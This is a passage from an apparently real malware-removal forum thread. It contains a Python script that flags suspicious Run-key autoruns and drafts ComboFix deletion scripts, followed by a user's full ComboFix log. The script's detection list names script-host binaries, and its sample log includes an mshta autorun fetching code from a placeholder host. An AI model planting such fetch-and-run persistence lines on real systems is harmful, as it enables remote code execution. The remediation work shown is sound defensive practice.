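# including a remote URL (mshta.exe http://... is the pattern in this thread).
LOLBINS = ("mshta.exe", "rundll32.exe", "regsvr32.exe",
           "wscript.exe", "cscript.exe", "powershell.exe")
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Locations a non-admin process can write to; vendor autoruns rarely live here.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")
# msconfig keeps a copy of disabled startup items under this key; the thread's fix
# deletes both the Run value and this copy so the entry cannot simply be re-enabled.
MSCONFIG_BACKUP = r"HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg"


def parse_run_entries(log_text):
    """Yield (key, name, command) for every value listed under a ...\\Run key."""
    key = None
    for raw in log_text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group("key")
            continue
        if key is None or not key.lower().endswith("\\run"):
            continue
        v = VALUE_RE.match(line)
        if v:
            yield key, v.group("name"), v.group("cmd")


def why_suspicious(command):
    """Return a reason if the autorun looks like script-host persistence, else None."""
    cmd = command.lower()
    host = next((b for b in LOLBINS if b in cmd), None)
    in_user_dir = any(d in cmd for d in USER_WRITABLE)
    if host and URL_RE.search(cmd):
        return f"{host} launched with a remote URL"
    if host and in_user_dir:
        return f"{host} loading content from a user-writable directory"
    if in_user_dir and cmd.endswith(".dll"):
        return "DLL autorun from a user-writable directory"
    return None


def find_suspicious(log_text):
    """Return [(key, name, command, reason)] for every flagged Run value."""
    findings = []
    for key, name, cmd in parse_run_entries(log_text):
        reason = why_suspicious(cmd)
        if reason:
            findings.append((key, name, cmd, reason))
    return findings


def build_cfscript(findings):
    """Draft a CFScript in the shape used in this thread: Killall::, a Registry::
    section that removes the msconfig backup key and the Run value, then Reboot::."""
    lines = ["Killall::", "Registry::"]
    by_key = {}
    for key, name, _cmd, _reason in findings:
        lines.append(f"[-{MSCONFIG_BACKUP}\\{name}]")
        by_key.setdefault(key, []).append(name)
    for key, names in by_key.items():
        lines.append(f"[{key}]")
        lines.extend(f'"{name}"=-' for name in names)
    lines.append("Reboot::")
    return "\n".join(lines) + "\n"


# Constructed sample in the log format seen above; the SystemBootEXAMPLE value,
# the example.invalid URL and the dates/sizes are made up for this example.
SAMPLE_LOG = r"""
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="c:\program files\Windows Sidebar\sidebar.exe" [2009-04-11 1233920]
"SystemBootEXAMPLE"="c:\windows\system32\mshta.exe http://example.invalid/reg2.php?cccid=EXAMPLE" [2012-05-19 0]
"fcconf"="c:\users\GAGAN\AppData\Local\Temp\dns-hone.dll" [2012-05-19 40960]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2012-03-26 931200]
"Apoint"="c:\program files\Apoint2K\Apoint.exe" [2006-09-11 180224]
"""

if __name__ == "__main__":
    hits = find_suspicious(SAMPLE_LOG)
    for key, name, cmd, reason in hits:
        print(f"{reason}: [{key}] {name} = {cmd}")
    print(build_cfscript(hits))
```

The heuristics are deliberately narrow: a plain .exe under AppData (Akamai NetSession or Google Talk in the log above) is not flagged, only script hosts given a URL or a user-writable path, and bare DLL autoruns from such paths. Anything it does flag should still be confirmed by hand before it goes into a CFScript, because ComboFix deletes what the Registry:: section names without further checks.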
gagraptor (THREAD STARTER; Member with 31 posts; Join Date: May 2012; Experience: Beginner)
29-May-2012, 02:06 PM #14
ComboFix 12-05-29.01 - GAGAN 05/29/2012 23:51:22.3.2 - x86
Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.1.1033.18.1917.927 [GMT -4:00]
Running from: c:\users\GAGAN\Desktop\ComboFix.exe
Command switches used :: c:\users\GAGAN\Desktop\CFScript.txt
AV: Microsoft Security Essentials *Disabled/Updated* {9765EA51-0D3C-7DFB-6091-10E4E1F341F6}
SP: Microsoft Security Essentials *Disabled/Updated* {2C040BB5-2B06-7275-5A21-2B969A740B4B}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\windows\system32\drivers\etc\hosts.ics
.
.
((((((((((((((((((((((((( Files Created from 2012-04-28 to 2012-05-30 )))))))))))))))))))))))))))))))
.
.
2012-05-30 04:03 . 2012-05-30 04:05 -------- d-----w- c:\users\GAGAN\AppData\Local\temp
2012-05-30 04:03 . 2012-05-30 04:03 -------- d-----w- c:\users\Default\AppData\Local\temp
2012-05-30 03:44 . 2012-05-30 03:44 29904 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{0D65DCBB-645F-4F85-8BC7-9E0E1CE17186}\MpKsl5ae50f1e.sys
2012-05-29 18:04 . 2012-05-08 13:40 6737808 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{0D65DCBB-645F-4F85-8BC7-9E0E1CE17186}\mpengine.dll
2012-05-29 03:00 . 2012-05-08 13:40 6737808 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2012-05-22 05:16 . 2012-05-22 05:16 713784 ------w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{F78CEF23-EB95-4DED-8458-48E319614326}\gapaengine.dll
2012-05-22 05:09 . 2012-05-22 05:10 -------- d-----w- c:\program files\Microsoft Security Client
2012-05-19 05:43 . 2012-05-19 09:50 -------- d-----w- c:\programdata\vsint
2012-05-14 22:57 . 2012-03-20 23:28 53120 ----a-w- c:\windows\system32\drivers\partmgr.sys
2012-05-14 22:57 . 2012-03-30 12:39 914304 ----a-w- c:\windows\system32\drivers\tcpip.sys
2012-05-14 22:57 . 2012-03-29 13:39 31232 ----a-w- c:\windows\system32\drivers\tcpipreg.sys
2012-05-14 22:57 . 2012-02-01 15:10 1404928 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\InkObj.dll
2012-05-14 22:57 . 2012-02-01 15:10 936960 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\journal.dll
2012-05-14 22:57 . 2012-02-29 13:41 1069056 ----a-w- c:\windows\system32\DWrite.dll
2012-05-14 22:57 . 2012-03-01 14:46 219648 ----a-w- c:\windows\system32\d3d10_1core.dll
2012-05-14 22:57 . 2012-02-29 14:08 1172480 ----a-w- c:\windows\system32\d3d10warp.dll
2012-05-14 22:57 . 2012-03-01 14:46 160768 ----a-w- c:\windows\system32\d3d10_1.dll
2012-05-14 22:57 . 2012-02-29 13:44 683008 ----a-w- c:\windows\system32\d2d1.dll
2012-05-14 22:56 . 2012-04-03 08:16 3550080 ----a-w- c:\windows\system32\ntoskrnl.exe
2012-05-14 22:56 . 2012-04-03 08:16 3602816 ----a-w- c:\windows\system32\ntkrnlpa.exe
2012-05-09 04:58 . 2012-05-09 04:58 592824 ----a-w- c:\program files\Mozilla Firefox\gkmedias.dll
2012-05-09 04:58 . 2012-05-09 04:58 44472 ----a-w- c:\program files\Mozilla Firefox\mozglue.dll
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2012-05-08 16:40 . 2012-05-19 08:37 6737808 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{3070EC37-30CA-43AE-AC15-BBE0716A8AAD}\mpengine.dll
2012-05-05 06:08 . 2012-04-07 05:22 419488 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2012-05-05 06:08 . 2011-06-14 22:11 70304 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2012-04-04 19:56 . 2010-02-20 07:40 22344 ----a-w- c:\windows\system32\drivers\mbam.sys
2012-04-02 13:36 . 2012-05-14 22:56 2044928 ----a-w- c:\windows\system32\win32k.sys
2012-03-21 00:44 . 2012-03-21 00:44 74112 ----a-w- c:\windows\system32\drivers\NisDrvWFP.sys
2012-03-21 00:44 . 2012-03-21 00:44 171064 ----a-w- c:\windows\system32\drivers\MpFilter.sys
2012-05-09 04:58 . 2011-06-08 03:45 97208 ----a-w- c:\program files\mozilla firefox\components\browsercomps.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\URLSearchHooks]
"{e9df9360-97f8-4690-afe6-996c80790da4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
.
[HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
.
[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{e9df9360-97f8-4690-afe6-996c80790da4}]
2011-05-09 08:49 176936 ----a-w- c:\program files\uTorrentControl\prxtbuTor.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
"{e9df9360-97f8-4690-afe6-996c80790da4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
.
[HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
.
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Webbrowser]
"{E9DF9360-97F8-4690-AFE6-996C80790DA4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
.
[HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="c:\program files\Windows Sidebar\sidebar.exe" [2009-04-11 1233920]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RtHDVCpl"="RtHDVCpl.exe" [2007-06-13 4489216]
"Apoint"="c:\program files\Apoint2K\Apoint.exe" [2006-09-11 180224]
"Skytel"="Skytel.exe" [2007-05-29 1826816]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 8.0\Reader\Reader_sl.exe" [2008-10-15 39792]
"00TCrdMain"="c:\program files\TOSHIBA\FlashCards\TCrdMain.exe" [2007-04-27 538744]
"SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2009-03-20 1451304]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2011-10-24 421888]
"TkBellExe"="c:\program files\real\realplayer\Update\realsched.exe" [2011-12-01 296056]
"DivXUpdate"="c:\program files\DivX\DivX Update\DivXUpdate.exe" [2011-07-28 1259376]
"SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2012-01-17 252296]
"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2012-02-21 59240]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2012-03-27 421736]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2012-03-26 931200]
.
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"Picasa Media Detector"="c:\program files\Picasa2\PicasaMediaDetector.exe" [2007-10-23 443968]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"EnableUIADesktopToggle"= 0 (0x0)
"EnableLinkedConnections"= 1 (0x1)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"aux1"=wdmaud.drv
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
@="Service"
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Metacafe.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\Metacafe.lnk
backup=c:\windows\pss\Metacafe.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Microsoft Office.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.lnk
backup=c:\windows\pss\Microsoft Office.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKLM\~\startupfolder\C:^Users^GAGAN^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2007 Screen Clipper and Launcher.lnk]
path=c:\users\GAGAN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
backup=c:\windows\pss\OneNote 2007 Screen Clipper and Launcher.lnk.Startup
backupExtension=.Startup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HWSetup]
\HWSetup.exe hwSetUP [X]
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Akamai NetSession Interface]
2011-12-13 04:20 3305760 ----a-w- c:\users\GAGAN\AppData\Local\Akamai\netsession_win.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\APSDaemon]
2012-02-21 01:28 59240 ----a-w- c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Camera Assistant Software]
2007-04-10 23:40 413696 ----a-w- c:\program files\Camera Assistant Software for Toshiba\traybar.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\dldtamon]
2010-02-10 12:39 16040 ----a-w- c:\program files\Dell V305\dldtamon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\dldtmon.exe]
2010-02-10 12:39 672424 ----a-w- c:\program files\Dell V305\dldtmon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\EPSON WorkForce 30 Series]
2007-11-26 21:00 188928 ----a-w- c:\windows\System32\spool\drivers\w32x86\3\E_FATIEEA.EXE
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\googletalk]
2007-01-01 21:22 3739648 ----a-w- c:\users\GAGAN\AppData\Roaming\Google\Google Talk\googletalk.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HSON]
2006-12-07 23:49 55416 ----a-w- c:\program files\Toshiba\TBS\HSON.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
2012-03-27 09:09 421736 ----a-w- c:\program files\iTunes\iTunesHelper.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\KeNotify]
2006-11-07 00:14 34352 ----a-w- c:\program files\Toshiba\Utilities\KeNotify.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\NBAgent]
2009-06-18 07:08 1062184 ----a-w- c:\program files\Nero\Nero BackItUp & Burn\Nero BackItUp\NBAgent.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Pando Media Booster]
2009-02-27 06:22 2785608 ----a-w- c:\program files\Pando Networks\Media Booster\PMB.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
2011-10-24 19:28 421888 ----a-w- c:\program files\QuickTime\QTTask.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RtHDVCpl]
2007-06-13 17:11 4489216 ----a-w- c:\windows\RtHDVCpl.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Skytel]
2007-05-29 00:39 1826816 ----a-w- c:\windows\SkyTel.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SmoothView]
2007-03-22 18:46 448632 ----a-w- c:\program files\Toshiba\SmoothView\SmoothView.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Speech Recognition]
2008-01-19 07:33 49664 ----a-w- c:\windows\Speech\Common\sapisvr.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\StartCCC]
2006-11-10 16:35 90112 ----a-w- c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SVPWUTIL]
2006-03-23 04:42 438272 ----a-w- c:\program files\Toshiba\Utilities\SVPWUTIL.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SynTPEnh]
2009-03-20 11:36 1451304 ----a-w- c:\program files\Synaptics\SynTP\SynTPEnh.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TPwrMain]
2007-03-29 17:39 411192 ----a-w- c:\program files\Toshiba\Power Saver\TPwrMain.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\VeohPlugin]
2011-06-30 10:11 2648184 ----a-w- c:\program files\Veoh Networks\VeohWebPlayer\veohwebplayer.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Yahoo! Pager]
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiSpyware]
"DisableMonitoring"=dword:00000001
.
R3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-05-05 257696]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
LocalServiceAndNoImpersonation REG_MULTI_SZ FontCache
.
Contents of the 'Scheduled Tasks' folder
.
2012-05-30 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-07 06:08]
.
2012-05-28 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-822561583-4103383742-3251873995-1000Core.job
- c:\users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe [2008-11-12 22:14]
.
2012-05-30 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-822561583-4103383742-3251873995-1000UA.job
- c:\users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe [2008-11-12 22:14]
.
2011-01-29 c:\windows\Tasks\User_Feed_Synchronization-{EA4C49AC-05D5-4334-B956-853DDFB08609}.job
- c:\windows\system32\msfeedssync.exe [2012-04-12 08:09]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://search.imesh.com/
mStart Page = hxxp://home.sweetim.com
mSearch Bar = hxxp://us.rd.yahoo.com/customize/ie/defaults/sb/msgr8/*http://www.yahoo.com/ext/search/search.html
uInternet Settings,ProxyOverride = *.local
LSP: c:\windows\system32\wpclsp.dll
TCP: DhcpNameServer = 192.168.1.1
FF - ProfilePath - c:\users\GAGAN\AppData\Roaming\Mozilla\Firefox\Profiles\bav5d5wt.default\
FF - prefs.js: browser.search.selectedEngine - GoogIe
FF - prefs.js: browser.startup.homepage - hxxp://www.aol.com/
FF - prefs.js: keyword.URL - hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3072254&SearchSource=2&q=
FF - user.js: browser.search.selectedEngine - GoogIe
FF - user.js: keyword.URL - hxxp://www.theast.com/search/?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&rls=sIjcOCzt&q=
FF - user.js: yahoo.homepage.dontask - true
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2012-05-30 00:09
Windows 6.0.6002 Service Pack 2 NTFS
.
scanning hidden processes ...
.
scanning hidden autostart entries ...
.
scanning hidden files ...
.
scan completed successfully
hidden files: 0
.
**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.aif\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.aifc\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.aiff\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.au\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.flac\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.m3u\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.mid\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.midi\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.mp3\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.ogg\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.pcm\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.pls\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.snd\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.spx\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.wav\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\File Exts\.wma\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow]
@Denied: (Read) (RestrictedCode)
@Denied: (Read) (LocalSystem)
@Denied: (Read) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Read) (Administrators)
@SACL=(02 0001)
@Ace=(0x11) (1) (S-1-16-4096)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Aurigma]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Conduit]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Unity]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\uTorrentControl]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\bookmarks]
@SACL=(02 0001)
"lastact"=dword:00003640
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\ButtonHistory]
@SACL=(02 0001)
"srch_ebox"=dword:4785b178
"srch_hlt"=dword:47854ece
"clkstrm"=dword:4785b2dc
"boo"=dword:4785b2dc
"etpg70_21"=dword:47854ece
"sst"=dword:47854ecf
"mess"=dword:4785b2dc
"mess_off"=dword:4785b2dc
"yma"=dword:47854eda
"mus"=dword:47854edb
"wik"=dword:47854edb
"vis_srch70"=dword:4785abea
"cacheldr"=dword:4785b2dc
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\URLHistory]
@SACL=(02 0001)
"srch"=dword:4785abec
"vis_srch70"=dword:4785abec
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\simi_zenith05]
@SACL=(02 0001)
"LastPoll_200"=dword:00041537
"resfeed"=dword:00000002
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\SearchHistory]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\CDDB]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\ej-technologies]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\ej-technologies\exe4j]
"InstallStarted"=dword:00000000
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall\jlGui 3.0]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
"UninstallString"="c:\\Windows\\system32\\javaws.exe -uninstall -prompt \"http://www.javazoom.com/jlgui/jws/jlgui3.0.jarjnlp\""
"DisplayName"="jlGui 3.0"
"DisplayIcon"="c:\\Users\\GAGAN\\AppData\\LocalLow\\Sun\\Java\\Deployment\\cache\\6.0\\57\\573addb9-2492e35c.ico"
"NoModify"=dword:00000001
"NoRepair"=dword:00000001
"Publisher"="Music Player for the Java(tm) Platform"
"Comments"="jlGui supports MP3, OGG VORBIS, FLAC, SPEEX, WAV, AIFF, AU audio formats. It ..."
"URLInfoAbout"="http://www.javazoom.net"
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\Microsoft\Windows\CurrentVersion\Webcheck\Store.1]
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\System\12a9d3cc-cd48-4c6b-a102-8b76a6f66e5a]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
"bgu0fw0tDZx8jtqEjccbDg=="=hex:45,75,92,1a,9f,09,c9,e9,d6,46,18,dd,5c,30,38,96
.
[HKEY_LOCAL_MACHINE\software\Classes\.hta]
@Denied: (Full) (Administrators)
@Denied: (Full) (Owner)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (Administrators)
@Denied: (Full) (Users)
@SACL=
"PerceivedType"="text"
@="htafile"
"Content Type"="application/hta"
.
[HKEY_LOCAL_MACHINE\software\Classes\.hta\PersistentHandler]
@="{eec97550-47a9-11cf-b952-00aa0051fe20}"
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
"MSCurrentCountry"=dword:000000b5
.
------------------------ Other Running Processes ------------------------
.
c:\program files\Microsoft Security Client\MsMpEng.exe
c:\windows\system32\Ati2evxx.exe
c:\windows\system32\Ati2evxx.exe
c:\windows\system32\agrsmsvc.exe
c:\program files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
c:\progra~1\mcafee\SITEAD~1\mcsacore.exe
c:\program files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
c:\windows\system32\rundll32.exe
c:\windows\System32\tcpsvcs.exe
c:\program files\TeamViewer\Version6\TeamViewer_Service.exe
c:\program files\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe
c:\windows\system32\TODDSrv.exe
c:\program files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
c:\program files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
c:\program files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
c:\program files\TeamViewer\Version6\TeamViewer.exe
c:\program files\Synaptics\SynTP\SynToshiba.exe
c:\program files\iPod\bin\iPodService.exe
c:\windows\system32\mshta.exe
c:\program files\Synaptics\SynTP\SynTPHelper.exe
c:\program files\Yahoo!\Messenger\ymsgr_tray.exe
c:\windows\system32\mshta.exe
.
**************************************************************************
.
Completion time: 2012-05-30 00:16:00 - machine was rebooted
ComboFix-quarantined-files.txt 2012-05-30 04:15
ComboFix2.txt 2012-05-29 18:01
ComboFix3.txt 2012-05-29 02:55
.
Pre-Run: 29,436,858,368 bytes free
